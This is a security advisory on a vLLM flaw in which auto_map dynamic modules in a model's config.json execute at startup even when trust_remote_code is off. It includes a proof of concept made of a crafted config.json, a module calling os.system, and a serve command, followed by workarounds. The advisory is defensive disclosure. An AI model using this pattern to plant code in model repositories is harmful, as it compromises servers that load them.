Published January 12, 2026
vLLM Remote Code Execution via auto_map Dynamic Module Loading
BugBunny.ai discovered a critical vulnerability in vLLM where Hugging Face auto_map dynamic modules are loaded during model resolution without gating on trust_remote_code, allowing attacker-controlled Python code in a model repo/path to execute at server startup.
TL;DR
Arbitrary code execution during model initialization
auto_map entries in model config.json.Root Cause
During model resolution, vLLM unconditionally iterates auto_map entries from the model config and calls try_get_class_from_dynamic_module, which delegates to Transformers' get_class_from_dynamic_module and executes the module code.
This occurs even when trust_remote_code is False, allowing a malicious model repo to embed arbitrary Python code in a referenced module and have it executed during initialization—before any request handling and without requiring API access.
Proof of Concept
A malicious model directory with a crafted config.json and Python module achieves arbitrary code execution when vLLM loads the model.
# 1. Create malicious model directory with config.json
{
"model_type": "llama",
"architectures": ["LlamaForCausalLM"],
"auto_map": {
"AutoConfig": "evil_mod.EvilConfig",
"AutoModel": "evil_mod.EvilModel"
}
}
# 2. Add malicious module (evil_mod.py)
import os
os.system("echo vllm_rce > /tmp/vllm_auto_map_rce")
class EvilConfig:
...
class EvilModel:
...
# 3. Start vLLM (trust_remote_code=False doesn't help!)
vllm serve ./malicious-model --model-impl transformers
# 4. Result: /tmp/vllm_auto_map_rce is created during model init
# Arbitrary code execution achieved without API access!
# Vulnerable code path:
# vllm/model_executor/models/registry.py:856 — auto_map resolution
# vllm/transformers_utils/dynamic_module.py:13 — get_class_from_dynamic_module
# ❌ No trust_remote_code check before executing dynamic module codeVulnerable Code Path
vllm/model_executor/models/registry.pyauto_map resolution without trust check
vllm/transformers_utils/dynamic_module.pyDelegates to get_class_from_dynamic_module
Workarounds
- Only load trusted model repositories and local paths.
- Avoid untrusted
auto_mapentries in model configs. - If possible, disable or strictly guard dynamic module loading before initialization.
- Run vLLM in isolated environments with minimal privileges.
Credits & Disclosure
Identified by the BugBunny.ai research team and reported to the vLLM maintainers for coordinated disclosure.
